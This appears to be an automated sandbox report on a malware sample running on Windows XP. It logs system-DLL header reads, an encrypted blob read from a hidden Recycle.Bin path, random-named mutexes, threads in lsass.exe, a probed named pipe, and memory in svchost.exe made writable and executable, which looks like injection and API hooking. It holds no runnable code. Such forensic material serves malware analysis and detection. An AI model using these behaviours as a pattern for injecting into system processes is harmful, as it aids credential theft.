File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 2031486238
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2031486850
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 2031487116
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2031487650
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2031487997
System info queried Type: BasicInformation success or wait 2031488817
System info queried Type: ProcessorInformation success or wait 2031489152
System info queried Type: BasicInformation success or wait 2031491159
System info queried Type: ProcessorInformation success or wait 2031491455
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031491868
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2031492727
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2031492997
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2031493702
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031493971
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 2031494286
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2031494901
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 2031495169
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2031495705
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: BE0000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2031496050
System info queried Type: BasicInformation success or wait 2031496876
System info queried Type: ProcessorInformation success or wait 2031497179
System info queried Type: BasicInformation success or wait 2031499762
System info queried Type: ProcessorInformation success or wait 2031500057
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2031500469
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2031501324
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2031501594
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2031502299
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2031502645
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 2031503074
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2031504225
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 2031504710
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\crypt32.dll success or wait 2031505475
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: F60000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2031505639
System info queried Type: BasicInformation success or wait 2031506475
System info queried Type: ProcessorInformation success or wait 2031506778
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2031508920
Thread created PID: 692 TID: 484 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2031510483
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2031527945
Thread delayed Time: 0 TID: 9768 success or wait 2033442484
Thread delayed Time: 0 TID: 9768 success or wait 2033459386
Thread delayed Time: 0 TID: 9768 success or wait 2033512455
Thread delayed Time: 0 TID: 9768 success or wait 2035755047
Thread delayed Time: 0 TID: 9768 success or wait 2035755731
Thread delayed Time: 0 TID: 9768 success or wait 2035756156
Thread delayed Time: 0 TID: 9768 success or wait 2036874334
Thread delayed Time: 0 TID: 9768 success or wait 2036875155
Thread delayed Time: 0 TID: 9768 success or wait 2036875651
Thread delayed Time: 0 TID: 9768 success or wait 2038031493
Thread delayed Time: 0 TID: 9768 success or wait 2038033330
Thread delayed Time: 0 TID: 9768 success or wait 2038034733
Thread delayed Time: 0 TID: 9768 success or wait 2041020352
Thread delayed Time: 0 TID: 9768 success or wait 2041022467
Thread delayed Time: 0 TID: 9768 success or wait 2041024289
Thread delayed Time: 0 TID: 9768 success or wait 2042279590
Thread delayed Time: 0 TID: 9768 success or wait 2042280771
Thread delayed Time: 0 TID: 9768 success or wait 2042303171
Thread delayed Time: 0 TID: 9768 success or wait 2046819654
Thread delayed Time: 0 TID: 9768 success or wait 2046820844
Thread delayed Time: 0 TID: 9768 success or wait 2046821543
Thread delayed Time: 0 TID: 9768 success or wait 2048439600
Thread delayed Time: 0 TID: 9768 success or wait 2048440796
Thread delayed Time: 0 TID: 9768 success or wait 2048442004
Thread delayed Time: 0 TID: 9768 success or wait 2049929980
Thread delayed Time: 0 TID: 9768 success or wait 2049930788
Thread delayed Time: 0 TID: 9768 success or wait 2049931485
Thread delayed Time: 0 TID: 9768 success or wait 2051535529
Thread delayed Time: 0 TID: 9768 success or wait 2051538130
Thread delayed Time: 0 TID: 9768 success or wait 2051539740
Thread delayed Time: 0 TID: 9768 success or wait 2052646094
Thread delayed Time: 0 TID: 9768 success or wait 2052647838
Thread delayed Time: 0 TID: 9768 success or wait 2052649672
Thread delayed Time: 0 TID: 9768 success or wait 2053766078
Thread delayed Time: 0 TID: 9768 success or wait 2053767922
Thread delayed Time: 0 TID: 9768 success or wait 2053769546
Thread delayed Time: 0 TID: 9768 success or wait 2054883299
Thread delayed Time: 0 TID: 9768 success or wait 2054883966
Thread delayed Time: 0 TID: 9768 success or wait 2054884673
Thread delayed Time: 0 TID: 9768 success or wait 2056005542
Thread delayed Time: 0 TID: 9768 success or wait 2056007565
Thread delayed Time: 0 TID: 9768 success or wait 2056009748
Thread delayed Time: 0 TID: 9768 success or wait 2057120872
Thread delayed Time: 0 TID: 9768 success or wait 2057122831
Thread delayed Time: 0 TID: 9768 success or wait 2057124849
Thread delayed Time: 0 TID: 9768 success or wait 2058239251
Thread delayed Time: 0 TID: 9768 success or wait 2058241147
Thread created PID: 692 TID: 1760 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2138837187
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2138847524
Thread created PID: 692 TID: 1976 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2246196338
Thread created PID: 692 TID: 1004 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2249250172
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2249294826
Thread created PID: 692 TID: 3964 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\lsass.exe Injected: false success or wait 2357131646
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2357133027
Analysis File: svchost.exe PID: 892 Parent PID: 1636
Sections
+ General
Start time: 05:48:06
Start date: 01/12/2011
Path: C:\WINDOWS\system32\svchost.exe
Commandline: C:\WINDOWS\system32\svchost -k DcomLaunch
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
Chronological sections
Operation Data Completion Time
Analysis File: svchost.exe PID: 968 Parent PID: 1636
+ Sections
+ General
Start time: 05:48:07
Start date: 01/12/2011
Path: C:\WINDOWS\system32\svchost.exe
Commandline: C:\WINDOWS\system32\svchost -k rpcss
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
c:\windows\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 3 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 5 BAD6699
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 5 BAD66D5
C:\WINDOWS\system32\ntdll.dll none 224 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 5 BAD6717
C:\WINDOWS\system32\ntdll.dll none 160 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 5 BAD67A2
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
C:\WINDOWS\system32\user32.dll none 4 D8 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\user32.dll none 20 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\user32.dll none 224 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\user32.dll none 160 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\wininet.dll none 4 F8 00 00 00 success or wait 11 BAD6699
C:\WINDOWS\system32\wininet.dll none 20 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 11 BAD66D5
C:\WINDOWS\system32\wininet.dll none 224 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 11 BAD6717
C:\WINDOWS\system32\wininet.dll none 160 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 11 BAD67A2
C:\WINDOWS\system32\ws2_32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\ws2_32.dll none 20 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\ws2_32.dll none 224 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\ws2_32.dll none 160 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\advapi32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\advapi32.dll none 20 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\advapi32.dll none 224 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\advapi32.dll none 160 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\crypt32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\crypt32.dll none 20 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\crypt32.dll none 224 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\crypt32.dll none 160 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 1 BAD67A2
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll PositionInformation Offset: 60 success or wait 20 BAD667A
C:\WINDOWS\system32\user32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\wininet.dll PositionInformation Offset: 60 success or wait 44 BAD667A
C:\WINDOWS\system32\ws2_32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
C:\WINDOWS\system32\advapi32.dll PositionInformation Offset: 60 success or wait 4 BAD667A
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\CRYPT32.dll write and read and execute unknown F60000 77824 own pid readonly object name not found 1 BAE50FD
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 BAE50FD
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown B00000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit DB0000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown E30000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit E30000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit E30000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit E30000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit E30000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit E30000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2 AF06B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
416 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 AF0639
392 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
2320 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
2328 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
424 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
2648 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3176 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3216 968 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
914 0s success or wait 822 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
416 968 success or wait 0 AF0279
Memory Activities:
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
968 C:\WINDOWS\system32\svchost.exe 7C90CFEE 2000 page execute and read and write page execute and read and write success or wait 2 AF05EC
968 C:\WINDOWS\system32\svchost.exe 7C90D76E 2000 page execute and read and write page execute and write copy success or wait 1 BAE95DC
968 C:\WINDOWS\system32\svchost.exe 7C90D76E 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
968 C:\WINDOWS\system32\svchost.exe BAF6E20 2000 page execute and read and write page execute and read and write success or wait 1 BAF2C8B
968 C:\WINDOWS\system32\svchost.exe 7C90DF1E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
968 C:\WINDOWS\system32\svchost.exe BB10A90 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CA1
968 C:\WINDOWS\system32\svchost.exe 7C90DC5E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
968 C:\WINDOWS\system32\svchost.exe BAFF2F8 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CB7
968 C:\WINDOWS\system32\svchost.exe 7C90D2EE 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
968 C:\WINDOWS\system32\svchost.exe BAFCF58 2000 page execute and read and write page execute and read and write success or wait 1 BAF2CCD
968 C:\WINDOWS\system32\svchost.exe 7C90DB3E 2000 page execute and read and write page execute and read and write success or wait 2 BAE95DC
968 C:\WINDOWS\system32\svchost.exe BB10168 2000 page execute and read and write page execute and read and write success or wait 1 BAF2D09
968 C:\WINDOWS\system32\svchost.exe 7E418BF6 2000 page execute and read and write page execute read success or wait 1 BAE95DC
968 C:\WINDOWS\system32\svchost.exe 7E418BF6 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
968 C:\WINDOWS\system32\svchost.exe BAFC210 2000 page execute and read and write page execute and read and write success or wait 1 BAED314
968 C:\WINDOWS\system32\svchost.exe 3D949088 2000 page execute and read and write page execute read success or wait 1 BAE95DC
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessorInformation success or wait 40 BAD6959
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2081175280
Thread created PID: 968 TID: 416 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2081179567
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081182631
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: F60000 Size: 77824 Protection: readonly Mapped to pid: own pid object name not found 2081182950
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2081184410
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2081185773
Memory attributes changed PID: 968 Path: C:\WINDOWS\system32\svchost.exe Base: 7C90CFEE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2081187346
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2081190446
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2081191924
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2081201411
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: B00000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2081207402
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2081214246
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2081223126
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2081354693
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 2081357135
